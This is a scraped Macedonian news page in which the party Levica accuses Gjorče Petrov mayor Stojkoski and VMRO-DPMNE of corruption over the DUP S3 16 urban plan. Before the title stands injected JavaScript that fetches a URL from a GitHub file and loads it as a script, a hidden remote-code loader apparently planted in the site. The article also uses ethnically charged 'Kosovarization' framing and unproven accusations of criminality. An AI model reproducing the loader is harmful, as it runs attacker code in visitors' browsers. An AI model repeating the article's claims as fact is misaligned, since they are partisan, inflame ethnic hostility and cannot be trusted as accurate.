;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Градоначалникот Стојкоски и ДПМНЕ се впуштија во брза косоваризација на Ѓорче Петров - Антропол
АктуелноЛокалноНастани

Градоначалникот Стојкоски и ДПМНЕ се впуштија во брза косоваризација на Ѓорче Петров

Откако советниците од ДПМНЕ во Советот на општина Ѓорче Петров, со претходен амин од министрите на СДСМ, го изгласаа криминалниот ДУП С3 16, веднаш се пристапи кон косоваризација на општина Ѓорче Петров, предупредуваат од Левица.

ДУП-от СЗ 16 шверцерски, на вонредна седница се донесе на 17 февруари 2024 година, а според огласите од 15 март 2024 година, може да се заклучи дека шефот на урбаната мафија – Стојкоски, експресно брзо издал одобренија за градење, односно постапил по претходно договорен дил.

Имено, неодамна на косовски веб-портали осамнаа огласи за продажба на станови со локација на спорниот ДУП.

Становите веќе почнале да се продаваат, а во огласите се вели дека бетонските чудовишта би биле готови за 2 години.

Левица постојано апелираше за штетните последици од криминалниот

ДУП С3 16. На оваа локација се предвидени над 20 висококатници односно над 30 станбени згради, над 3.000 станови, над 10.000 нови жители односно 2.675 нови возила.

Сето ова на сметка на водоснабдувањето на Ѓорче Петров и Скопје, трајно загрозување на бунарското подрачје и питката вода, канализациониот систем на општината, хуманото живеење и животната средина.

Единствено е непознаница за граѓаните на Ѓорче Петров колку од проценетите 240 милиони евра ќе завршат во џебот на основоположникот на косоваризацијата на Ѓорче Петров – Стојкоски и ДПМНЕ?!

За крај, го прашуваме градоначалникот Стојкоски: Дали училиштата во општина Ѓорче Петров се спремни за формирање на албански паралелки?